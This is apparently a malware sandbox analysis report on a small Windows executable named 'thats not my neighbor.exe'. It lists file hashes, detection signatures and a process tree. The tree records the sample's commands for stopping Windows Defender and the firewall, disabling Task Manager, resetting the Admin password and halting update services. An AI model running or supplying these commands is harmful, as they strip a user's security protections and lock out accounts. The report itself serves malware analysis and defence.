Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

26/07/2024, 19:00

240726-xnn2xsyarn 8

Analysis

  • max time kernel
    30s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26/07/2024, 19:00

General

  • Target

    thats not my neighbor.exe

  • Size

    8KB

  • MD5

    c6bffae52e9552a22a1aee2993ee361c

  • SHA1

    9799422474b327cc48e7d8ca1029d9f4ef1f2900

  • SHA256

    3bdc58e1586f13c2235facad41e048e9475fb7a0f3cf28f106fbc496ddba4c3e

  • SHA512

    e9f4a95e9469d4aa45b94879c57d5f296c3d2194af6007865943fcb9ebd719f73815e65557e22f83c605d973924b12a340f6d29bc23e3baa7496a34d4cbcc2ed

  • SSDEEP

    192:QLTeeNdaLixSepSnm/VunlYJLLLTuEFNZEk9qaP:QLTtdaLiyuhPLTuEFzETa

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\thats not my neighbor.exe
    "C:\Users\Admin\AppData\Local\Temp\thats not my neighbor.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3456
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cmd.bat" "
      2⤵
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\system32\net.exe
        net user Admin *
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4160
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user Admin *
          4⤵
            PID:5100
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\msg.vbs"
          3⤵
            PID:2856
          • C:\Windows\system32\reg.exe
            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
            3⤵
              PID:2300
            • C:\Windows\system32\net.exe
              net stop "SDRSVC"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4124
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "SDRSVC"
                4⤵
                  PID:2452
              • C:\Windows\system32\net.exe
                net stop "WinDefend"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:852
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "WinDefend"
                  4⤵
                    PID:1404
                • C:\Windows\system32\taskkill.exe
                  taskkill /f /t /im "MSASCui.exe"
                  3⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:912
                • C:\Windows\system32\net.exe
                  net stop "security center"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2352
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "security center"
                    4⤵
                      PID:3572
                  • C:\Windows\system32\net.exe
                    net stop sharedaccess
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4036
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop sharedaccess
                      4⤵
                        PID:3408
                    • C:\Windows\system32\netsh.exe
                      netsh firewall set opmode mode-disable
                      3⤵
                      • Modifies Windows Firewall
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3552
                    • C:\Windows\system32\net.exe
                      net stop "wuauserv"
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3028
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop "wuauserv"
                        4⤵
                          PID:1176

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\cmd.bat

                    Filesize

                    468B

                    MD5

                    2b9ccce74e81c3cabce2fb1514677509

                    SHA1

                    2341cd92d99fec49c5159ce211c3669433857a9a

                    SHA256

                    30ec46b57b19643023ba0446487665dacf706eb15a0d246f75cfa254b8fadba3

                    SHA512

                    3b4b0676f39de4edb5fb1bf1537309bef0d481c5c3f5d8f741a5b69a809d8167b27737bd07c8d71fd540b715cc9cf33f528603e1e4d9f68dfaa94d00d1c01d2b

                  • C:\Users\Admin\AppData\Local\Temp\msg.vbs

                    Filesize

                    47B

                    MD5

                    5d4eba0009c1dd2bf2cff5511895e871

                    SHA1

                    05dfce10a23414969a666d8fc515995907c68b94

                    SHA256

                    0eb06871785e054d02e424877f0345aeffa7f5f21cfebb0cc55c879b1bc9d69a

                    SHA512

                    cfce66eb85c4914fded6abd600c4c6c351d918b996923bb027cb52594bbbb0386905b68b06f31ac27ae4a09d9c8652d15644038f9b9604632d69ef606248ec79

                  • memory/3456-0-0x00007FFEF9823000-0x00007FFEF9825000-memory.dmp

                    Filesize

                    8KB

                  • memory/3456-1-0x0000000000D50000-0x0000000000D58000-memory.dmp

                    Filesize

                    32KB